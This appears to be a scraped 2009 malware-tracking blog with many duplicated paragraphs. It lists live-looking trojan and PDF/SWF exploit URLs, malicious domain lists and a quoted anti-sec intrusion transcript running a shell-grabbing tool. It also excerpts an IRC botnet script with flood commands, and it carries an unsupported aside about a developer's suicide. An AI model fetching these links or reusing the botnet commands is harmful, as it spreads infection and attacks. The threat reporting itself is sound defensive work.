DICTIONARY’, ‘CREATE ANY TRIGGER’ or something like this. But this methods can’t give you 100% success. I guess there must be another way maybe not universal but better then described.
In short, this paper describes investigations to get administrative shell on server having unprivileged rights on Oracle Database......
Malware related links *gianttoplocate.cn* - 09 June
Malicious link
Level 0: http: //yournameshop.cn:8080/index.php
Level 1: http: //yournameshop.cn:8080/cache/readme.pdf
(Trojan)Level 2: http: //gianttoplocate.cn:8080/landig.php?id=1
Level 1: http: //yournameshop.cn:8080/cache/flash.swf
Index.php
Decode index.php
From the script, it attempt to download malicious PDF to manipulate util.print() and malicious flash SWF once the Adobe not to latest patch. At last, it will download Trojan file from gianttoplocate website.
The trojan was submitted to Virustotal for analysis.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Level 0: http: //yournameshop.cn:8080/index.php
Level 1: http: //yournameshop.cn:8080/cache/readme.pdf
(Trojan)Level 2: http: //gianttoplocate.cn:8080/landig.php?id=1
Level 1: http: //yournameshop.cn:8080/cache/flash.swf
Index.php
Publish Post
Decode index.php
From the script, it attempt to download malicious PDF to manipulate util.print() and malicious flash SWF once the Adobe not to latest patch. At last, it will download Trojan file from gianttoplocate website.
The trojan was submitted to Virustotal for analysis.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Zero-day vulnerability in the LxLabs HyperVM software caused 100,000 websites hacked
Resource: http://www.neowin.net/news/main/09/06/08/100000-websites-destroyed-by-hackers#comments
As many as 100,000 websites have been destroyed by hackers targeting server virtualisation software HyperVM, which powers most virtual private server (VPS) hosting companies.
Most of the VPS systems hosted by Vaserv, and its sister companies CheapVPS and FSCKVPS were taken offline, with data on some of its servers destroyed without backups, when the hackers exploited a zero-day vulnerability in the LxLabs HyperVM software to gain root access to its servers. The hackers were then able to run commands (such as "rm -rf", Linux parlance for "remove everything, all files and folders, no questions asked,") to destroy both user and system data, preventing the servers from booting, and preventing users from recovering data.
Vaserv has estimated that almost half of the data hosted on their servers has been destroyed by the attack.
The identity of the hackers is unknown, and no hacking groups have claimed the attack. Vaserv stated that "This wasn't someone randomly scanning things. It was a deliberate attack on our infrastructure." It has also stated that, although the hackers had full root access to its systems, all sensitive data such as names, addresses, and credit card details were encrypted.
It is unknown whether any other hosting companies running HyperVM have been attacked. Anybody who uses a server hosted by Vaserv or its sister companies can check the progress of the rescue operation here.
As many as 100,000 websites have been destroyed by hackers targeting server virtualisation software HyperVM, which powers most virtual private server (VPS) hosting companies.
Most of the VPS systems hosted by Vaserv, and its sister companies CheapVPS and FSCKVPS were taken offline, with data on some of its servers destroyed without backups, when the hackers exploited a zero-day vulnerability in the LxLabs HyperVM software to gain root access to its servers. The hackers were then able to run commands (such as "rm -rf", Linux parlance for "remove everything, all files and folders, no questions asked,") to destroy both user and system data, preventing the servers from booting, and preventing users from recovering data.
Vaserv has estimated that almost half of the data hosted on their servers has been destroyed by the attack.
The identity of the hackers is unknown, and no hacking groups have claimed the attack. Vaserv stated that "This wasn't someone randomly scanning things. It was a deliberate attack on our infrastructure." It has also stated that, although the hackers had full root access to its systems, all sensitive data such as names, addresses, and credit card details were encrypted.
It is unknown whether any other hosting companies running HyperVM have been attacked. Anybody who uses a server hosted by Vaserv or its sister companies can check the progress of the rescue operation here.
Updated 11June:
Breaking news!
Bangalore-based developer was found suicide dead on Monday, because of 0day exploit in HyperVM...Poor guy!
Monday, June 8, 2009
Facebook's User Email Spamming to mailbox
Last two days, I received few messages sent from Facebook and pretend from somebody you know...Luckily it wouldn't work on me because I know that I did not registered Facebook using hotmail account. So those few messages must something interesting to look at. It try to foolish users or trick users to open message to click on the links inside the messages. Someone must earn lots of money from these kind of massive clicking.. :)
When opened these junk messages from one to one, it looks like kind of spamming message to adult and pharmaceutic website. Of course, this technique not new, we had seen this kind of similar spamming in pdf, document, flash and other formats. Strongly believed that this is kind of continuous experiment on behalf spammers to challenge anti spam engine. ..
When opened these junk messages from one to one, it looks like kind of spamming message to adult and pharmaceutic website. Of course, this technique not new, we had seen this kind of similar spamming in pdf, document, flash and other formats. Strongly believed that this is kind of continuous experiment on behalf spammers to challenge anti spam engine. ..
Sunday, June 7, 2009
Search "Own3d" string in Google
While searching "Own3d" string in Google, you can easily found that few websites hosting pages that contain "Own3d" .
http://pswm.org/templates/own3d.html
http://www.permislegal.com/
http://pswm.org/templates/own3d.html
http://www.permislegal.com/
Hackers target Winodws XP ATM machines
Original Article: MaximumPC
"Trustwave's SpiderLabs performed the analysis of malware found installed on compromised ATMs in the Eastern European region," TrustWare said. "This malware captures magnetic stripe data and PIN codes from the private memory space of transaction-processing applications installed on a compromised ATM."
According to the report, the compromised ATMs all ran Microsoft's Windows XP operating system. The malware is installed and activated through a dropper file and once compromised, hackers then have full control over the machine via a customized user interface and accessible by inserting a special controller card into the ATM.
"Trustwave's SpiderLabs performed the analysis of malware found installed on compromised ATMs in the Eastern European region," TrustWare said. "This malware captures magnetic stripe data and PIN codes from the private memory space of transaction-processing applications installed on a compromised ATM."
According to the report, the compromised ATMs all ran Microsoft's Windows XP operating system. The malware is installed and activated through a dropper file and once compromised, hackers then have full control over the machine via a customized user interface and accessible by inserting a special controller card into the ATM.
ACAi ELITE ..and Dr.Max Man Spam......
IP Address: 220.248.184.7
Domain lists:
callnices.com
cxvjpiet.cn
fmdwyhygh.boqaqaroy.cn
idyogtri.cn
joinmake.com
litefort.com
makeflat.com
nafaxunap.cn
okomptfh.lufecumul.cn
phone.addresses.com
phone.theyellowpages.com
qomawuciv.cn
quincy.doyslho.cn
ricadigox.cn
rushpact.com
tafibahav.cn
wadeship.com
widewarm.com
www.aihleyvo.cn
www.bjopifde.cn
www.daqemumaw.cn
www.fhbpiii.cn
www.iorodl.cn
www.iyljoq.cn
www.iylkjoo.cn
www.mortgagemodifications247.com
www.muluqemuw.cn
www.ocaofca.cn
www.odlorid.cn
www.vppoiwrt.cn
www.wazadixih.cn
www.yaoaoe.cn
www.uiuungyo.cn
www.rljilup.cn
www.tvwewpw.cn
www.uiyasawo.cn
www.tvgrri.cn
IP Address: 220.248.167.110
Domain lists:
*.cjkoeoe.cn
*.clflqlyl.cn
*.curtcome.com
*.deyurabaw.cn
*.foladikat.cn
*.gigehonus.cn
*.grsiud.cn
*.hifediyen.cn
*.iyldjkoo.cn
*.jezuriteq.cn
*.jipilipuj.cn
*.netdnshosting.com
*.oinoqq.cn
*.oiyldyi.cn
*.qcjfonll.cn
*.qoxiwabal.cn
*.ruhubanim.cn
*.seervery.com
*.simicukoq.cn
*.thednsfactory.com
*.uinexjdo.cn
*.uisdwjto.cn
*.uiwbapdo.cn
*.yotusuziq.cn
ciifwu.cn
cjkoeoe.cn
clflqlyl.cn
deyurabaw.cn
foladikat.cn
gigehonus.cn
grsiud.cn
haroqokic.cn
hifediyen.cn
honoqituj.cn
iyldjkoo.cn
iylqcby.cn
jezuriteq.cn
jipilipuj.cn
nefuqadeq.cn
netdnshosting.com
ns1.netdnshosting.com
oinoqq.cn
oiyldyi.cn
qoxiwabal.cn
ruhubanim.cn
seervery.com
simicukoq.cn
tafukuyun.cn
targtar.cn
thednsfactory.com
uinexjdo.cn
uisdwjto.cn
uiwbapdo.cn
www.cjkoeoe.cn
www.qcjfonll.cn
www.qoxiwabal.cn
www.ruhubanim.cn
www.seervery.com
www.uinexjdo.cn
www.uisdwjto.cn
www.uiwbapdo.cn
www.yotusuziq.cn
www.uibloulo.cn
www.aizxrdio.cn
www.uidijsno.cn
www.uiifskdo.cn
www.ttieehj.cn
www.uiqrzljo.cn
www.uiuungyo.cn
www.uiemnzlo.cn
www.uijcopeo.cn
yorejiter.cn
yotusuziq.cn
zesezuqew.cn
zofuzmik.com
POPULAR On-Line BookStore was compromised to host malicious script
POPULAR Bookstore with domain popular.com.sg was compromised to host malicous code. These POPULAR quite famous especially in SEA.
The malicious code were encoded as you can see from image.
The malicious code decoded and showed redirect users to exploit site "suptullog.com"
"suptullog.com" site...thanks to robtex.com
When connecting to "suptullog.com", (PDF Exploit) "http://suptullog.com//image/pfre.php" it try to exploit users sytem through PDF vulnerability. An PDF file was downloaded into system to exploit Heap Spray PDF function Collab.getIcon() and Adobe util.printf()
Malicious PDF will redirect to (Trojan)"http://suptullog.com/image/ouet.php" to download malicious file called "install.exe"
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
The malicious code were encoded as you can see from image.
The malicious code decoded and showed redirect users to exploit site "suptullog.com"
"suptullog.com" site...thanks to robtex.com
When connecting to "suptullog.com", (PDF Exploit) "http://suptullog.com//image/pfre.php" it try to exploit users sytem through PDF vulnerability. An PDF file was downloaded into system to exploit Heap Spray PDF function Collab.getIcon() and Adobe util.printf()
Malicious PDF will redirect to (Trojan)"http://suptullog.com/image/ouet.php" to download malicious file called "install.exe"
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Saturday, June 6, 2009
Temporarily handling DirectShow 0Day Exploit
For those IE fans, Microsoft still not release their patch to fix the DirectShow 0Day vulnerability yet and you will lucky if they release the patch this month or next month. For temporarily to fix the problem, Microsoft release article in their website how to fix the Quicktime inside the registry. At here, It will be good practice if the you can consider following step by during some configuration inside the Security setting.
1. Open IE --> Tools --> Internet Options
2. Click Security tab, highlight Internet --> Click Custom Level
3. Disable "Run components not signed with Authenticode" and "Run components signed with Authenticode"
This kind of setting not fix the DirectShow vulnerability problem, at least it can prevent any successful attempt to manipulate the vulnerability.
1. Open IE --> Tools --> Internet Options
2. Click Security tab, highlight Internet --> Click Custom Level
3. Disable "Run components not signed with Authenticode" and "Run components signed with Authenticode"
This kind of setting not fix the DirectShow vulnerability problem, at least it can prevent any successful attempt to manipulate the vulnerability.
Astalavista Hacking Security and Community was hacked
Original Article: http://pastebin.com/f751e9f5b
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
From <>:
>> 03. Who's behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
Why has Astalavista been targeted?
Other than the fact that they are not doing any of this for the "community" but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.
We wanted to see how good that "team of security and IT professionals" really is.
Let's begin.
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it
[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
From <>:
>> 03. Who's behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
Why has Astalavista been targeted?
Other than the fact that they are not doing any of this for the "community" but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.
We wanted to see how good that "team of security and IT professionals" really is.
Let's begin.
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it
[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
Thursday, June 4, 2009
Taget vulnerability on Microsoft DirectShow ??
Since Microsoft announced that their product contain critical vulnerability and patches, attacker started target for those users that not updated to latest patches. I foresee it will become another attacking wave impact to users who surfing internet frequently.
According article from SecurityFocus, Microsoft warned that DirectShow vulnerability also effect the Apple QuickTime that use Directx library.....
Microsoft Security Response Center blogging about this ....
If you doubt about your systems, please have online checking from http://support.microsoft.com/gp/cp_fixit_main#tab0
You may consider product from F-Secure Exploit Shield, seem like their beta able to counter DirectShow vulnerability..
Reference about this
1. http://www.microsoft.com/technet/security/advisory/971778.mspx
2. Microsoft article 971778
3. CVE Reference http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537
4. F-Secure Exploit Shield vs DirectShow
According article from SecurityFocus, Microsoft warned that DirectShow vulnerability also effect the Apple QuickTime that use Directx library.....
Microsoft Security Response Center blogging about this ....
If you doubt about your systems, please have online checking from http://support.microsoft.com/gp/cp_fixit_main#tab0
You may consider product from F-Secure Exploit Shield, seem like their beta able to counter DirectShow vulnerability..
Reference about this
1. http://www.microsoft.com/technet/security/advisory/971778.mspx
2. Microsoft article 971778
3. CVE Reference http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537
4. F-Secure Exploit Shield vs DirectShow
Malicious URLs * 04-June-09*
IP Address: 193.108.81.200
Domain lists:
greatbethere.cn
lotbetsite.cn
thebestyoucanfind.cn
IP Address: 72.232.242.82
Domain lists:
kit-fuck.biz
porn-master.biz
teen.porn-here.biz
Domain lists:
greatbethere.cn
lotbetsite.cn
thebestyoucanfind.cn
IP Address: 72.232.242.82
Domain lists:
kit-fuck.biz
porn-master.biz
teen.porn-here.biz
Attacking operation from kraton.penggingcity.com start?? Botnet? Zombie?
Hi dude, when harvesting malicious website. I found one txt file contain all IRC command used to connect once trojan installed on victim machine and connect back to IRC. From the content, It seem like the infected machines will become Botnet or Zombies and used to perform DDoS to target machines. Since I can't understand Portuguese language, so it seem like a puzzle for me to combine all within short time :(.
This file called "prendedor.pl"
First, try to gather from where source from ?
http://125.163.251.219/har ??
Your IP Address: 125.163.251.2
IP Address Hostname: 2.subnet125-163-251.speedy.telkom.net.id
IP Country: Indonesia
IP Country Code: IDN
IP Continent: Asia
IP Region: Yogyakarta
Guessed City: Yogyakarta
IP Latitude: -7.7828
IP Longitude: 110.3608
ISP Provider: PT. Telecomunikasi Indonesia
kraton.penggingcity.com = 94.23.114.15 (GERMANY)
Your IP Address: 94.23.114.15
IP Address Hostname: 94.23.114.15
IP Country: Germany
IP Country Code: DEU
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 51
IP Longitude: 9
ISP Provider: Connecting Life
irc.racrew.us =
82.146.54.69
Your IP Address: 82.146.54.69
IP Address Hostname: admin.indovds.com
IP Country: Russian Federation
IP Country Code: RUS
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 60
IP Longitude: 100
ISP Provider: ISPsystem at NAC
174.34.131.70
Your IP Address: 174.34.131.70
IP Address Hostname: el8.com.br
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Ohio
Guessed City: Cleveland
IP Latitude: 41.3861
IP Longitude: -81.7102
ISP Provider: JinxShells
209.20.65.73
Your IP Address: 209.20.65.73
IP Address Hostname: 209-20-65-73.slicehost.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Missouri
Guessed City: Saint Louis
IP Latitude: 38.6446
IP Longitude: -90.2533
ISP Provider: Slicehost LLC
74.3.40.137
Your IP Address: 74.3.40.137
IP Address Hostname: h-74-3-40-137-static.lsanca54.covad.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: California
Guessed City: Culver City
IP Latitude: 34.0202
IP Longitude: -118.3928
ISP Provider: Covad Communications
Few keywords were found like these....
!target NICK (Especifica novo alvo)\n";
!ctcpflood (Envia flood ctcp)\n";
!dccflood (Envia flood dcc)\n";
!noticeflood (Envia flood de notice)\n";
!msgflood (Envia flood de mensagens)\n";
!hop #chan msg (Entra e sai de um canal deixando msg)\n";
From the scripts, the noted was writted by
#
# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# desde 2001 ouvindo backstreet boys
#
#
and the IRC "irc.racrew.us" will be used for sure by who claimed as "racrew"
Attacker will pretend with different type of names in IRC channel and below are the nickname used :
@nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda", "Aleks","Allison","Alongi","Altavilla","Altenberger","Altenhofen","Amaral","Amatangelo","Ameer","Amsden","Anand","Andel", "Ando","Andrelus","Andron","Anfinrud","Ansley","Anthony","Antos","Arbia","Arduini","Arellano","Aristotle","Arjas","Arky","Atkins", "Augustus","Aurelius","Axelrod","Axworthy","Ayiemba","Aykroyd","Ayling","Azima","Bachmuth","Backus","Bady","Baglivo","Bagnold", "Bailar","Bakanowsky","Baleja","Ballatori","Ballew","Baltz","Banta","Barabesi","Barajas","Baranczak","Baranowska","Barberi","Barbetti", "Barneson","Barnett","Barriola","Barry","Bartholomew","Bartolome","Bartoo","Basavappa","Bashevis","Batchelder","Baumiller","Bayles","Bayo", "Beacon","Beal","Bean","Beckman","Beder","Bedford","Behenna","Belanger","Belaoussof","Belfer","Belin-Collart","Bellavance","Bellhouse", "Bellini","Belloc","Benedict-Dye","Bergson","Berke-Jenkins","Bernardo", "Bernassola","Bernston","Berrizbeitia","Betti","Beynart","Biagioli", "Bickel","Binion","Bir","Bisema","Bisho","Blackbourn","Blackwell","Blagg","Blakemore","Blanke","Bliss","Blizard","Bloch","Bloembergen", "Bloemhof","Bloxham","Blyth","Bolger","Bolick","Bollinger","Bologna","Boner","Bonham","Boniface","Bontempo","Book","Bookbinder","Boone", "Boorstin","Borack","Borden","Bossi","Bothman","Botosh","Boudin","Boudrot","Bourneuf","Bowers","Boxer","Boyajian","Boyes","Boyland", "Boym", "Boyne","Bracalente","Bradac","Bradach","Brecht","Breed","Brenan","Brennan","Brewer","Brewer","Bridgeman","Bridges","Brinton", "Britz","Broca","Brook","Brzycki","Buchan","Budding","Bullard","Bunton","Burden","Burdzy","Burke","Burridge","Busetta","Byatt","Byerly", "Byrd","Cage","Calnan","Cammelli","Cammilleri","Canley","Capanni","Caperton","Capocaccia","Capodilupo","Cappuccio","Capursi","Caratozzolo", "Carayannopoulos","Carlin","Carlos","Carlyle","Carmichael","Caroti","Carper","Cartmill","Cascio","Case","Caspar","Castelda","Cavanagh", "Cavell","Ceniceros","Cerioli","Chapman","Charles","Cheang","Cherry","Chervinsky","Chiassino","Chien","Childress","Childs","Chinipardaz", "Chinman","Christenson","Christian","Christiano","Christie","Christopher","Chu","Chupasko","Church","Ciampaglia","Cicero","Cifarelli", "Claffey","Clancy","Clark","Clement","Clifton","Clow","Coblenz","Coito","Coldren","Colella","Collard","Collis","Compton","Compton", "Comstock","Concino","Condodina","Connors","Corey","Cornish","Cosmides","Counter","Coutaux","Crawford","Crocker","Croshaw","Croxen", "Croxton","Cui","Currier","Cutler","Cvek","Cyders","daSilva","Daldalian","Daly","D'Ambra","Danieli","Dante","Dapice","D'arcangelo","Das", "Dasgupta","Daskalu","David","Dawkins","DeGennaro","DeLaPena","del'Enclos","deRousse","Debroff","Dees","Defeciani","Delattre","Deleon-Rendon", "Delger","Dell'acqua","Deming","Dempster","Demusz","Denault","Denham","Denison","Desombre","Deutsch","D'fini","Dicks","Diefenbach","Difabio", "Difronzo","Dilworth","Dionysius","Dirksen","Dockery","Doherty","Donahue","Donner","Doonan","Dore","Dorf","Dosi","Doty","Doug","Dowsland", "Drinker","D'souza","Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner","Edward","Eickenhorst","Eliasson", "Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","Erdos","Erez","Espinoza","Estes","Etter","Euripides", "Everett","Fabbris","Fagan","Faioes","Falco-Acosta","Falorsi","Faris","Farone","Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman", "Fernald","Fernandes","Ferrante","Ferriell","Feuer","Fido","Field","Fink","Finkelstein","Finnegan","Fiorina","Fisk","Fitzmaurice","Flier", "Flores","Folks","Forester","Fortes","Fortier","Fossey","Fossi","Francisco","Franklin-Kenea","Franz","Frazier-Davis","Freid","Freundlich", "Fried","Friedland","Frisken","Frowiss","Fryberger","Frye","Fujii-Abe","Fuller","Furth","Fusaro","Gabrielli","Gaggiotti","Galeotti","Galwey", "Gambini","Garfield","Garman","Garonna","Geller","Gemberling","Georgi","Gerrett","Ghorai","Gibbens","Gibson","Gilbert","Gili","Gill","Gillispie", "Gist","Gleason","Glegg","Glendon","Goldfarb","Goncalves","Good","Goodearl","Goody","Gozzi","Gravell","Greenberg","Greenfeld","Griffiths", "Grigoletto","Grummell","Gruner","Gruppe","Guenthart","Gunn","Guo","Ha","Haar","Hackman","Hackshaw","Haley","Halkias","Hallowell","Halpert", "Hambarzumjan","Hamer","Hammerness","Hand","Hanssen","Harding","Hargraves","Harlow","Harrigan","Hartman","Hartmann","Hartnett","Harwell", "Haviaras","Hawkes","Hayes","Haynes","Hazlewood","Heermans","Heft","Heiland","Hellman","Hellmiss","Helprin","Hemphill","Henery","Henrichs", "Hernandez","Herrera","Hester","Heubert","Heyeck","Himmelfarb","Hind","Hirst","Hitchcock","Hoang","Hock","Hoffer","Hoffman","Hokanson","Hokoda", "Holmes","Holoien","Holter","Holway","Holzman","Hooker","Hopkins","Horsley","Hoshida","Hostage","Hottle","Howard","Hoy","Huey","Huidekoper", "Hungerford","Huntington","Hupp","Hurtubise","Hutchings","Hyde","Iaquinta","Ichikawa","Igarashi","Inamura","Inniss","Isaac","Isaievych","Isbill", "Isserman","Iyer","Jacenko","Jackson","Jagers","Jagger","Jagoe","Jain","Jamil","Janjigian","Jarnagin","Jarrell","Jay","Jeffers","Jellis", "Jenkins","Jespersen","Jewett","Johannesson","Johannsen","Johns","Jolly","Jorgensen","Jucks","Juliano","Julious","Kabbash","Kaboolian","Kafadar", "Kalbfleisch","Kaligian","Kalil","Kalinowski","Kalman","Kamel","Kangis","Karpouzes","Kassower","Kasten","Kawachi","Kee","Keenan","Keepper", "Keith","Kelker","Kelsey","Kempton","Kemsley","Kendall","Kerry","Keul","Khong","Kimmel","Kimmett","Kimura","Kindall","Kinsley","Kippenberger", "Kirscht","Kittridge","Kleckner","Kleiman","Kleinfelder","Klemperer","Kling","Klinkenborg","Klint","Knuff","Kobrick","Koch","Kohn","Koivumaki", "Kommer","Koniaris","Konrad","Kool","Korzybski","Kotter","Kovaks","Kraemer","Krailo","Krasney","Kraus","Kroemer","Krysiak","Kuenzli","Kumar", "Kusman","Kuwabara","La","Labunka","Lafler","Laing","Lallemant","Landes","Lankes","Lantieri","Lanzit","Laserna","Lashley","Lawless","Lecar", "Lecce","Leclercq","Leite","Lenard","Sofia","Lesser","Lessi","Liakos","Lidano","Liem","Light","Lightfoot","Lim","Linares","Linda","Linder", "Line","Linehan","Linzee","Lippmann","Lipponen","Little","Litvak","Livernash","Livi","Livolsi","Lizardo","Locatelli","Longworth","Loss","Loveman", "Lowenstein","Loza","Lubin","Lucas","Luciano","Luczkow","Luecke","Lunetta","Luoma","Lussier","Lutcavage","Luzader","Ma","Maccormac","Macdonald", "Maceachern","Macintyre","Mackenney","MacMillan","Macy","Madigan","Maggio","Mahony","Maier","Maine-Hershey","Maisano","Malatesta","Maller", "Malova","Progho","Mandel","Manganiello","Mantovan","March","Marchbanks","Marcus","Margalit","Margetts","Marques","Martinez","Martochio", "Marton","Marubini","Mass","Matalka","Matarazzo","Matsukata","Mattson","Mauzy","May","Mazzali","Mazziotta","Mcbride","Mccaffery","Mccall", "Mcclearn","Mcdowell","Mcelroy","McFadden","Mcghee","Mcgoldrick","McIlroy","Mcintosh","Mcdonald","Mclane","Mclaren","Mcnealy","Mcnulty", "Meccariello","Memisoglu","Menzies","Merikoski","Merlani","Merminod","Merseth","Merz","Metelka","Metropolis","Meurer","Michelman","Middle", "Mieher","Mills","Minh","Mini","Minichiello","Gonzalez","Mitropoulos","Mittal","Mocroft","Modestino","Moeller","Mohr","Moiamedi","Monque","Montilio", "MooreDeCh.","Morani","Moreton","Morrison","Morrow","Mortimer","Mosher","Mosler","Mostafavi","Motooka","Mudarri","Muello","Mugnai","Mulkern", "Mulroy","Mumford","Mussachio","Naddeo","Napolitano","Nardi","Nardone","Naviaux","Nayduch","Nelson","Nenna","Nesci","Neuman","Newfeld","Newlin", "Ng","Ni","Nickerson","Nickoloff","Nisenson","Nitabach","Notman","Nuzum","Ocougne","Ogata","Oh","O'hagan","Oldford","Olsen","Olson","Olszewski", "O'malley","Oman","O'meara","Opel","Oray","Orfield","Orsi","Ospina","Ostrowski","Ottaviani","Otten","Ouchida","Ovid","PaesDealmeida","Paine", "Palayoor","Palepu","Pallara","Palmitesta","Panadero","Panizzon","Pantilla","Paoletti","Parmeggiani","Parris","Partridge","Pascucci","Patefield", "Patrick","Pattullo","Pavetti","Pavlon","Pawloski","Paynter","Peabody","Pearlberg","Pederson","Peishel","Penny","Pereira","Perko","Perlak", "Perlman","Perna","Perone","Perrimon","Peters","Petruzello","Pettibone","Pettit","Pfister","Pilbeam","Pinot","Plancon","Plant","Plasket","Plous", "Po","Pocobene","Poincaire","Pointer","Poirier","Polak","Polanyi","Politis","Poma","Poolman","Powers","Presper","Preucel","Prevost","Pritchard", "Pritz","Proietti","Prothrow-Stith","Puccia","Pugh","Pynchon","Quaday","Quetin","Rabe","Rabkin","Radeke","Rajagopalan","Raney","Rangan","Rankin", "Rapple","Rayport","Redden-Tyler","Reedquist","Cunningham","Reinold","Remak","Renick","Repetto","Resnik","Rhea","Richmond","Rielly","Rindos", "Rineer","Rish","Rivera","Robinson","Rocha","Roesler","Rogers","Ronen","Row","Royal","Ru","Ruan","Ruderman","Ruescher","Rush","Ryu","Sabatello", "Sadler","Safire","Sahu","Sali","Samson","Sanchez-Ramirez","Sanna","Sapers","Sarin","Sartore","Sase","Satin","Satta","Satterthwaite","Sawtell", "Sayied","Scarponi","Scepan","Scharf","Scharlemann","Scheiner","Schiano","Schifini","Schilling","Schmitt","Schossberger","Schuman","Schutte", "Schuyler","Schwan","Schwickrath","Scovel","Scudder","Seaton","Seeber","Segal","Sekler","Selvage","Sen","Sennett","Seterdahl","Sexton", "Seyfert","Shaikh","Shakis","Shankland","Shanley","Shar","Shatrov","Shavelson","Shea","Sheats","Shepherd","Sheppard","Shepstone","Shesko","Shia", "Shibata","Shimon","Siesto","Sigalot","Sigini","Signa","Silverman","Silvetti","Sinsabaugh","Sirilli","Sites","Skane","Skerry","Skoda","Sloan", "Slowe","Smilow","Sniffen","Snodgrass","Socolow","Solon","Somers","Sommariva","Sorabella","Sorg","Sottak","Soukup","Soule","Soultanian","Spanier", "Sparrow","Spaulding","Speizer","Spence","Sperber","Spicer","Spiegelhalter","Spiliotis","Spinrad","StMartin","Stalvey","Stam","Stang","Stassinopolus", "States","Statlender","Stefani","Steiner","Stephanian","Stepniewska","Stewart-Oaten","Stiepock","Stillwell","Stock","Stockton","Stockwell","Stolzenberg", "Stonich","Storer","Stott","Strange","Strauch","Streiff","Stringer","Sullivan","Sumner","Suo","Surdam","Sweeting","Sweetser","Swindle","Tagiuri", "Tai", "Talaugon","Tambiah","Tandler","Tanowitz","Tatar","Taveras","Tawn","Tcherepnin","Teague","Temes","Temmer","Tenney","Terracini","Than", "Thavaneswaran","Theodos","Thibault","Thisted","Thomsen","Throop","Tierney","Till","Timmons","Tofallis","Tollestrup","Tolls","Tolman","Tomford", "Toomer","Topulos","Torresi","Torske","Towler","Toye","Traebert","Trenga","Trewin","Tringali","Troiani","Troy","Truss","Tsiatis","Tsomides","Tsukurov", "Tuck","Tudge","Tukan","Turano","Turek","Tuttle","Twells","Tzamarias","Ullman","Untermeyer","Upsdell","Urban","Urdang-Brown","Usdan","Uzuner", "Vacca","Waite","Valberg","Valencia","Wales","Wallenberg","Walter","Brontok","VanZwet","Vandenberg","Vanheeckeren","Warshafsky","Wasowska","Vasquez", "Waugh","Weighart","Weingarten","Weinhaus","Weissbourd","Weissman","Velasquez","Welles","Welsh","Wengret","Venne","Verghese","Wescott","Wetzel", "Whately","Whilton","White","Whitla","Whittaker","Viana","Viano","Wiedersheim","Wiener","Viens","Vignola","Wilder","Wilhelm","Wilk","Wilkin","Wilkinson", "Villarreal","Willstatter","Wilson","Vitali","Viviani","Voigt","Wolk","VonHoffman","Woo","Wooden","Woods","Woods-Powell","Vorhaus","Votey","Yacono", "Yamane","Yankee","Yarchuk","Yates","Ybarra","Yedidia");
Below are the few string used decode used MIME::Base64
$string1 = "ZGFya2x5";
$string2 = "Y0t6";
$string3 = "cGFuYQ==";
$string4 = "RnVzaW9u";
$string5 = "SXowbg==";
